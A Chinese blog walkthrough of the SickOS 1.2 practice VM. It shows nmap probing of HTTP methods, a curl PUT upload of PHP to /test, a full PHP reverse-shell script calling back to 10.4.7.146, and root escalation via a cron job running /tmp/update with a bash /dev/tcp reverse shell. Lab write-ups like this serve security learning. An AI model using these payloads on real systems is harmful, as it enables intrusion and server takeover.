sickos-1.2 靶机

文章描述了一次针对特定网站的黑客扫描过程,使用工具如Nmap探测HTTP方法,发现PUT上传漏洞,随后上传php探针并实现反弹shell。通过修改计划任务,最终实现对服务器的提权操作。
摘要由CSDN通过智能技术生成

sickos-1.2

信息搜集

存活检测

image-20231101170151895

详细扫描

image-20231101210041659

后台网页扫描

image-20231101170201527

网页信息搜集

查看扫描出的 index.php

image-20231101170425571

查看扫描出的 /test 页面

image-20231101170530503

是一个索引目录,其中显示了文件

对该网页进行扫描,探测是否有可操作空间

nmap --script http-methods --script-args http-methods.url-path='/test' 10.4.7.163

# --script http-methods  用于探测目标主机上支持的HTTP方法。
# --script-args http-methods.url-path='/test'   请求时使用/test作为URL路径

发现可以使用 PUT 上传等方法

image-20231101171716838

漏洞利用

编写 php 探针

<?php phpinfo();?>

image-20231101173456295

上传 php 探针

curl -v -T shell.php  -H 'Expect:' "http://10.4.7.163/test/"

# -v 显示详细的输出信息
# -T 要上传的文件
# -H 'Expect:' 请求头被设置为空值。这是为了防止在上传文件时出现`Expect: 100-continue`请求头,因为某些服务器可能会拒绝该请求头。

image-20231101173630024

刷新 /test 页面,成功上传探针

image-20231101173210692

打开 shell.php 页面

可以成功执行 php 代码

image-20231101173728933

生成反弹 shell 木马

<?php
$ip='10.4.7.146';
$port=443;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh ' , $descriptorspec,$pipes);
proc_close($process);

image-20231101200125605

开启 443 端口监听(iptables 防火墙过滤规则中只允许源端口 443 和 8080,root 进去就可以查看,root 之前看别人攻略)

点击上传的木马文件

image-20231101200218503

成功反弹

image-20231101200243836

查看计划任务

ls -la /etc/cron*

image-20231101201810138

查看版本

image-20231101201914395

搜索漏洞并下载

image-20231101202100394

查看文件

image-20231101202611411

说在 /tmp 下创建一个 update 文件,写入命令会以 root 身份定期执行

给 update 执行权限 chmod +x update

printf '#!/bin/bash\nbash -i >& /dev/tcp/10.4.7.146/8080 0>&1\n' > /tmp/update

image-20231101205903434

kali 开启 8080 端口监听

等待 root 权限的计划任务自动执行,以 root 身份反弹

提权成功

image-20231101210458296

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值